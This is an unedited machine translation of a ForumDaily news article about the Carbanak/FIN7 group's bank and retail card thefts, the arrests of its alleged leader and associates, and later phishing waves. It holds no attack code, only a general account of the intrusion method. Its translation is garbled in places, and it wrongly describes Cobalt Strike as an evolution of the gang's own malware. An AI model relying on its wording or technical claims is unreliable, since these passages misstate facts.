XXI century 'Robin Hoods': how Ukrainian hackers stole $ 1 billion and annoy Trump - ForumDaily
The article has been automatically translated into English by Google Translate from Russian and has not been edited.
Переклад цього матеріалу українською мовою з російської було автоматично здійснено сервісом Google Translate, без подальшого редагування тексту.
Bu məqalə Google Translate servisi vasitəsi ilə avtomatik olaraq rus dilindən azərbaycan dilinə tərcümə olunmuşdur. Bundan sonra mətn redaktə edilməmişdir.

'Robin Hoods' of the XXI century: how Ukrainian hackers stole $ 1 billion and annoyed Trump

How Ukrainian hackers stole a billion dollars and annoy Trump.

Фото: Depositphotos

«Country“I figured out what is known about the members of the most successful hacker group in history, what caused its leaders to get burned, and why even after the arrests were made, the Robin Hood case of the 21st century lives on.

In early August, the US Department of Justice's press service announced the arrest of hackers, whom Washington calls key figures in an extensive network of international criminal groups of cyber fraudsters.

Americans call it “FIN7,” but this structure has many other names. Among them are “Cobalt”, “Anunak”, “Navigator Group”, and the most popular in the Russian-language segment of the Internet is “Carbanak”.

The latter, as investigators believe, is responsible for hundreds of online robberies around the world, the seizure of funds totaling $1,2 billion and the fame of the “elusive Robin Hoods.” Which for five years have been “nightmare” for moneybags around the world, but at the beginning of 2018 they were exposed. Within a couple of months of each other, four Ukrainian citizens were detained in Europe, including the leader of a “computer organized crime group.”

However, this did not stop the wave of attacks - network attacks with the signature “Carbanak” style continue to this day.

The story of the “crazy ATM”

For the first time, the transnational hacker group “Carbanak”, which includes citizens of Ukraine, Russia, European countries and China, became known back in 2013.

Then the cameras of one of the Ukrainian banks recorded people withdrawing money from ATMs without cards or entering a PIN code. The New York Times called this incident with the sudden “madness” of an ATM in Kyiv a “haphazard spitting out” of money at the feet of passers-by. But it turned out that this was the least of the financial institution’s problems, which were subsequently revealed during the investigation.

Bankers contacted Kaspersky Lab, saying that money had started disappearing from their accounts. They assumed that they were dealing with ordinary thieves who were breaking into specific ATMs. But soon a malicious attack with a similar style was carried out against another bank, this time from Russia. It became clear: the reason for the “craziness” of bank terminals is a hitherto unprecedented phenomenon of a different order. This is how IT security specialists became acquainted with the Anunak malware, which was later modified into the Carbanak version, and after 2016 - the Cobalt Strike software.

The principle of operation of viruses was described in detail by Kaspersky Lab experts in their report on the activities of the hacker group. According to their findings, gang members carried out an unprecedented series of computer hacks into banking systems.

The geography of the group was impressive. At first, the attackers sent phishing emails with infected files to financial institutions in the CIS, Eastern Europe and Southeast Asia, and in 2017, banks located in North and South America and even Western Europe were added to this list.

How hackers robbed banks

It all started with the seemingly innocent spamming. Disguised as official phishing emails came to the employees of the victim bank, where a Microsoft Word document was attached to the attachment. When it was opened, malicious code was downloaded to the computer, which spread through the internal banking network, infect servers and ATM controllers, and transmitted information to third-party hacker servers. Following this, the attackers took control of the webcam of corporate computers of banks, took screenshots and recorded combinations on keyboards.

The hackers approached each robbery systematically and carefully. Thus, hacking one bank took 2-4 months - cybercriminals were looking for employees with the authority to manage cash flows between accounts, different creditors and ATMs. They also found out how and at what point the bank redirected the money. They used all this in the future so as not to attract the attention of security officers at the time of “H” time. By entering bankers' verification codes to carry out transactions, the transfer/issuance of funds looked completely sterile, and the system let them through.

Carrying out the theft of funds, the attackers acted in three ways:

1. They gave teams to certain banks so that they would begin to issue cash at the moment when the members of the group were next to them. Law enforcement officers dubbed these accomplices “money mules,” “droppers,” or “brothers-in-law.” They took banknotes spit out from ATMs without entering a card or code.

2. Interbank money transfer systems were instructed to transfer money to their accounts via the SWIFT network. Perhaps the most famous attack on this system for transmitting financial information was recorded in 2017 in Russia. Then its victim turned out to be Globex Bank (controlled by Vnesheconombank), from where hackers, using Cobalt Strike software, withdrew an amount equivalent to $1 million.

According to estimates by Russian financiers, last year alone, the banking institutions of the northern neighbor lost 1 billion rubles due to cyber fraud attacks. More than 240 credit institutions were attacked, of which more than a dozen were successful.

3. They changed the databases to increase the balances on the “needed” accounts.

Later, the stolen capital was converted into a cryptocurrency, which put an end to the attempts of law enforcement officers to find traces of hackers.

Scammers went into retail and got to the clients of the hotel of the President of the USA

Wired magazine studied the work of a mysterious hacker group and came to the conclusion: in fact, it resembles a large company with a monthly “income” of about $50 million. Its staff is recruited from all over the world and a clear work schedule has been introduced - from 9 a.m. to 18 p.m. “They probably have a leader, managers, money launderers, software developers, testers,” wrote American journalists.

The US Department of Justice states that in addition to banks, hackers from Eastern Europe attacked more than a hundred American companies, mainly from the service sector - the restaurant, gambling and hotel businesses.

In the United States alone, this group hacked into corporate networks in 47 states and the District of Columbia, stealing more than 15 million customer card identities from more than 6500 POS terminals. Companies that have admitted to data theft include department stores Fifth Avenue, Saks Off 5th, Lord & Taylor, Whole Foods, Chipotle, Trump Hotels, Jason's Deli and Omni Hotels & Resorts, Arby's, Mexican Grill, Chili's, Red Robin.

The attackers stole the data in their usual way—by sending phishing emails. They stated their intention to allegedly place an order. For example, hackers sent requests to hotels to book a room, and to restaurants about a large takeout order or complaints about service.

In total, according to Europol's estimates, over the five years of its existence, the organized criminal group has seized funds totaling $ 1,2 billion. The total list of their victims only in the banking industry includes hundreds of financial institutions in 40 countries of the world.

Robin Hood from Alicante

Versions of how the great-guardians managed to get on the trail of criminals differ.

As TASS wrote, the leader of the group was identified by Russian law enforcement officers back in 2015. Then one of the Russian banks discovered the theft of 60 million rubles from its accounts, and local security forces established that one of the organizers of the operation was a native of the Magadan region, Denis Tokarenko. He was put on the wanted list, and it turned out that the man had moved to Odessa in 2013, where he acquired Ukrainian citizenship under the name Katana.

Four years ago, Denis and his family moved to Spain, where a local court refused to extradite him to Russia. Ultimately, the “brains” of Carbanac were detained only in the spring of 2018.

According to Europol, this was preceded by a multi-year special operation, in which security officials of a dozen states participated. Allegedly, law enforcement officers investigated samples of malicious software code and found out that traces of the virus lead to the apartments of Tokarenko-Katana in Alicante. Then, as Bloomberg wrote, they began to monitor the Ukrainian.

At first glance, Denis looked like an ordinary migrant who is building a new life in the West, settling in a modest apartment on the Playa de San Juan. But at the same time, the man did not make the impression of a person who is trying to fit into a new life - he did not learn Spanish and did not go to the famous San Juan beach in Alicante. A much more active behaved online, often spending a laptop all night.

However, these clues would hardly have allowed to cover a cautious hacker if it were not for two accidents.

First, the criminals were let down by their most obvious vulnerability: people. In 2016, police managed to catch “money mules” taking money from ATMs in Taiwan. This happened after one of them lost his credit card at the crime scene.

The man was detained, and on his iPhone, in addition to numerous photographs of cash, they found correspondence with the person who managed the operation. It turned out to be “Spaniard” Catana, whose phone was wiretapped. It bore fruit: at the beginning of 2018, the police found out that Denis and his accomplices were going to release a more modern version of Carbanak. And they decided to take it.

Secondly, Tokarenko-Katana himself made a mistake. As El Mundo newspaper wrote, the cybercrime genius forgot to pay for the purchase of a new car. A few months before his arrest, Denis bought a car for 70 thousand euros, but never paid off the bills. The seller became worried and reported it to the police in early March. The “cops” came to Denis’s house, believing that they were dealing with an ordinary debtor. And only after comparing the data did they realize that in front of them was a man wanted for remotely emptying ATMs and bank accounts around the world.

Be that as it may, on March 6, Katana was detained, and his main weapon, a laptop, was confiscated. On it, law enforcement officers found traces of the man’s wealth: 15 thousand bitcoins – about $162 million at the exchange rate at that time.

 

In the Carbanak hierarchy, the investigation assigns him a leading role - carrying out reconnaissance in banking systems and “shuffling” cash flows within the network. At the trial in Spain, Denis already called himself Robin Hood, who stole money not from ordinary people, but from the “bad guys” - banks.

What is known about the accomplices of Katana

By that time, 15 “in-laws” had been identified (four of them were detained in the UK, Belarus, Kyrgyzstan and Taiwan) and three of Denis’s closest assistants. All of them also turned out to be citizens of Ukraine.

The investigation describes their assigned roles as follows: one sent phishing emails, the second was a database expert and “cleaned up digital traces” of crimes, the third supervised the recruitment of regional executors (those “droppers” or “money mules”). And although they were captured at the beginning of the year, only in early August the names of these people were published by the US Department of Justice - these are Dmitry Fedorov, Fedor Gladyr and Andrei Kolpakov.

They are charged with 26 felonies each, including conspiracy, computer hacking, device fraud, identity theft, and petty fraud. Only one of the three detainees, 33-year-old Gladyr, is now in the United States (the issue of extradition of his accomplices continues to be resolved).

The US Department of Justice report characterizes the man as a programmer known as AronaXus or das, one of the senior high-level system administrators at Carbanak. Fedorov (nickname - hotdima) and Andrey Kolpakov (known under the nicknames santisimo, santisimoz and Andrey KS) are also described there as network implementation specialists, so-called “pen-testers”.

According to American security officials, computer thieves have created a fake information security company called Combi Security. The company profile posted on Ukrainian websites indicates that the company has headquarters in Moscow and Haifa. It is believed that this structure was used to recruit new employees and as a legal cover for hacking schemes. “Ironically, the fictitious company’s alleged clients include its many victims in the United States,” the FBI’s website says in this regard.

New attacks

Security experts recall how, after the arrest of Carbanak's leader and close associates, bankers around the world sighed, thinking their troubles were over. But their expectations were not met: Carbanak managed to have many improved clones, including one well-known name - the Cobalt group created by Tokarenko-Katana himself.

In March, May and June 2018, several new waves of phishing related to Carbanak were observed. Then banks and processing companies in different countries of the world became victims. The attacks occurred using vulnerabilities CVE-2017-11882 and CVE-2017-8570. According to the official version, they may be backed by accomplices of the leader of the cyber group, who are thus trying to “whitewash” the leader of the organized crime group.

Analysts are inclined to a slightly different interpretation of the situation. In their opinion, the arrest of Katana, Kolpakov, Gladyr and Fedorov did not break the back of the well-functioning criminal structure of Carbanak. “Someone who used part of this software was arrested... This may be a fairly high link in the food chain, but this certainly does not mean the cessation of the work of all groups,” journalists quote Dmitry Chorin, head of the technology department at Gemini Advisory.

And if this is true, then it may well be that right now the surviving hackers from Carbanak are gaining access to someone’s bank card. Or even hundreds of millions of accounts worldwide.

Read also on ForumDaily:

Personal experience. Why I love American banks

9 ways to send money from the US to their homeland

How to make money without working

8 tips how to build a good credit history in the USA

We become obese in the USA: what to carry to the bank and how to make certificates

Why do immigrants return home

Miscellanea In the U.S. Bank money scammers ATM
Subscribe to ForumDaily on Google News

Do you want more important and interesting news about life in the USA and immigration to America? — support us donate! Also subscribe to our page Facebook. Select the “Priority in display” option and read us first. Also, don't forget to subscribe to our РєР ° РЅР ° Р »РІ Telegram  and Instagram- there is a lot of interesting things there. And join thousands of readers ForumDaily New York — there you will find a lot of interesting and positive information about life in the metropolis. 



 
1074 requests in 1,116 seconds.